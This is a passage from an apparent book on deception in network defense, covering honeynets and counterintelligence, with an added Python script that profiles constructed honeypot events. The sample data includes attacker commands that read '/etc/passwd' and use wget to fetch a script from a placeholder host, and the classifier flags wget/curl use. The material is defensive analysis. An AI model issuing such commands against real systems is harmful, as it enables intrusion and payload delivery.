them, there’s a key question at the end: Is there a way to weave a new effort out of the remnants of the old? Even with a failure, is it possible that the adversary, now that he knows we might try this and that, could be less alert to, or less sensitive to, a variation?
Active vs. Passive Deception
Deception, like intelligence, may have both passive and active aspects. Purely passive deceptions may only cause an attacker to expose his methods for our study. Active deceptions may involve setting up an attacker for an exploitation of our own.
Passivity characterizes most network defenses in that the defender waits for the attacker. Passwords are an example. They merely prevent an attacker from gaining easy access to network content, but by that point, the attacker has already learned something. For the defender, passwords are easy to administer and control. Used well and conscientiously administered in concert with other defenses, passwords can be very effective.
But holding an attacker at bay will not be enough. With sufficient incentive and enough time and resources, a determined attacker may gain access somehow. In the end, passive measures leave the initiative in the attacker’s hands. He calculates how much of his time and resources your data is worth.
As a fondly remembered counterintelligence instructor once said, “The purpose of a lock is not to deter criminals. It is to keep honest people honest.”
A honeynet—a vulnerable net set out to entice attackers so that their methods may be studied—is passive but also active in the sense that it can be placed or designed to attract a certain kind of attacker. It is true that the honeynet itself induces behavior in an attacker, but, if deception were part of the plan at all, the exploitation may be indirect or deferred.
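The passive side of a honeynet is that it simply records what visitors do; the value comes from turning those records into a picture of each attacker's methods. The following Python is an added illustration, not code from the book: it takes a handful of constructed low-interaction honeypot events (timestamp, source address, event kind, detail) and builds a per-source profile of credentials tried and commands issued, then applies assumed thresholds to label the kind of visitor the decoy attracted. The event format, the addresses, and the labels are all assumptions made for the example.

```python
"""Summarise what a low-interaction honeypot observed, per attacking source.

Added illustration for the honeynet passage; the events below are constructed,
not real captures, and the record layout is an assumption of this example.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class SourceProfile:
    """What one source revealed about its methods while interacting with the decoy."""
    attempts: int = 0                       # login attempts seen
    usernames: set = field(default_factory=set)
    commands: list = field(default_factory=list)
    first_seen: str = ""
    last_seen: str = ""


# Constructed sample records: (timestamp, source, kind, detail).
# "login" detail is "user:password"; "cmd" detail is the shell command attempted.
SAMPLE_EVENTS = [
    ("2024-05-01T02:14:03Z", "198.51.100.7", "login", "root:123456"),
    ("2024-05-01T02:14:05Z", "198.51.100.7", "login", "admin:admin"),
    ("2024-05-01T02:14:09Z", "198.51.100.7", "login", "root:toor"),
    ("2024-05-01T02:14:10Z", "198.51.100.7", "cmd", "uname -a"),
    ("2024-05-01T02:14:12Z", "198.51.100.7", "cmd", "cat /etc/passwd"),
    ("2024-05-01T03:40:41Z", "203.0.113.22", "login", "pi:raspberry"),
    ("2024-05-01T03:40:43Z", "203.0.113.22", "cmd", "wget http://example.invalid/x.sh"),
    ("2024-05-01T04:02:00Z", "192.0.2.15", "login", "guest:guest"),
]


def profile_sources(events):
    """Group honeypot events by source and collect what each source exposed."""
    profiles = defaultdict(SourceProfile)
    for ts, src, kind, detail in events:
        p = profiles[src]
        if not p.first_seen:
            p.first_seen = ts
        p.last_seen = ts
        if kind == "login":
            p.attempts += 1
            p.usernames.add(detail.split(":", 1)[0])
        elif kind == "cmd":
            p.commands.append(detail)
        # Unknown event kinds are ignored rather than failing the whole summary.
    return dict(profiles)


def classify(profile):
    """Crude label for the kind of visitor the decoy drew (assumed thresholds)."""
    if any(c.split(" ", 1)[0] in ("wget", "curl") for c in profile.commands):
        return "dropper-stage"       # fetched a payload after login: likely automated
    if profile.commands:
        return "interactive-recon"   # ran commands to look around
    if profile.attempts >= 3:
        return "credential-guessing"
    return "probe"                   # a single touch, nothing learned yet


def summarise(events):
    """Return {source: (label, attempts, sorted usernames, commands)} for reporting."""
    out = {}
    for src, p in profile_sources(events).items():
        out[src] = (classify(p), p.attempts, sorted(p.usernames), list(p.commands))
    return out


if __name__ == "__main__":
    for src, (label, attempts, users, cmds) in summarise(SAMPLE_EVENTS).items():
        print(f"{src:15} {label:20} logins={attempts} users={users} cmds={cmds}")
```

The point of the labels is not precision but the distinction the text draws: a purely passive decoy yields this kind of study material, while an active deception would go on to shape what the visitor does next.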
Counterintelligence seeks not only to frustrate hostile attempts to penetrate friendly secrets. At its highest level, counterintelligence seeks ultimately to control the hostile intelligence service.[7] Active deception seeks to attract specific attackers so that they may be studied and their networks identified, but exploitation of the attacker and his net is the main aim. It seeks to manipulate the behavior of the attacker, the better to cause him to behave in ways advantageous to the defense. The exploitation is the culminating purpose of counterintelligence. That one intelligence service only rarely achieves control over another testifies to the difficulty of doing so, but the goal persists.
Intelligence may be gathered in the course of a deception operation and then studied and integrated into a deception, but those are incidental spin-off benefits. At minimum, the active deception seeks to disadvantage the hostile attacker by causing him to accept unwise risks, gather erroneous information, or behave in ways embarrassing or damaging to his sponsor. At maximum, active deception seeks to destroy the attacker, at least figuratively, by causing him not merely to behave ineffectively but to become a source of disruption or loss to others of his ilk.
Clearly, there is a continuum of risk associated with deception, as there is with any competitive endeavor. The actions taken to beat a competitor are bound to elicit responses from the competitor. And the responses will be commensurate with perceptions of risk or gain on both sides. Risk of failure or blowback is always part of the calculation of how and to what extent deception can be used as an element of network defense.
When to Deceive
The following is a simple diagram that attackers or defenders of networks may use to organize their thinking about deception. Clearly quite simple-minded, it is meant only to provoke. Also, it illustrates the need to think about attacking and attackers along a continuum—a fairly long one. This is also the case with deceptive defenses and defenders.
Deception originating in the lower-right corner of this diagram may be least dangerous to